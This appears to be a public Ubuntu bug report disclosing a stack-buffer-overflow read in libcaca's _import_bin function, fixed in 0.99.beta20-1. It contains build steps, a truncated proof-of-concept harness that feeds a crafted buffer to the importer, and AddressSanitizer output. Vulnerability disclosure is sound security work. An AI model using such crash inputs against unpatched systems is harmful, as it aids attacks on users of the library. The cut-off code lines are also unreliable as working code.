stack-buffer-overflow of import.c in function _import_bin
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
libcaca |
Fix Released
|
Unknown
|
|||
libcaca (Ubuntu) |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
Hello ubuntu security team
issues:https:/
System info:
Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0
Fedora 33: clang 11.0.0 , gcc 10.2.1
libcaca version e4968ba
Verification steps:
1.Get the source code of libcaca
2.Compile the libcaca.so library
$ cd libcaca
$ ./bootstrap
$ ./configure
$ make
or
$ cd libcaca
$ ./bootstrap
$ ../configure CC="clang -O2 -fno-omit-
$ make
3.Create the poc_bin.cc && build
#include "config.h"
#include "caca.h"
//#include "common-image.h"
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fstream>
#include <iostream>
using namespace std;
void crash(const uint8_t *Data, size_t Size) {
if(Size<8) return ;
size_t len=0;
caca_canvas_t *cv;
cv = caca_create_
caca_
caca_
caca_
caca_
cv=NULL;
}
int main(int args,char* argv[]){
size_t len = 0;
unsigned char buffer[] = {0x0a,0x20,
len = sizeof(
return 0;
}
4.compile poc_bin.cc
clang++ -g poc_bin.cc -O2 -fno-omit-
5.Run poc_bin
asan info:
=======
==3817476==ERROR: AddressSanitizer: stack-buffer-
READ of size 1 at 0x7ffe7cd3774d thread T0
#0 0x7f8c6314acfc in _import_bin /home/hh/
#1 0x4c6c72 in crash(unsigned char const*, unsigned long) /home/hh/
#2 0x4c6c72 in main /home/hh/
#3 0x7f8c62ba00b2 in __libc_start_main /build/
#4 0x41c38d in _start (/home/
Address 0x7ffe7cd3774d is located in stack of thread T0 at offset 45 in frame
#0 0x4c6b9f in main /home/hh/
This frame has 1 object(s):
[32, 45) 'buffer' (line 31) <== Memory access at offset 45 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-
Shadow bytes around the buggy address:
0x10004f99ee90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99eed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x10004f99eee0: 00 00 00 00 f1 f1 f1 f1 00[05]f3 f3 00 00 00 00
0x10004f99eef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x10004f99ef30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==3817476==ABORTING
Thanks
information type: | Public → Public Security |
description: | updated |
Changed in libcaca (Ubuntu): | |
status: | New → Triaged |
Changed in libcaca: | |
status: | Unknown → New |
Changed in libcaca: | |
status: | New → Fix Released |
was solved in 0.99.beta20-1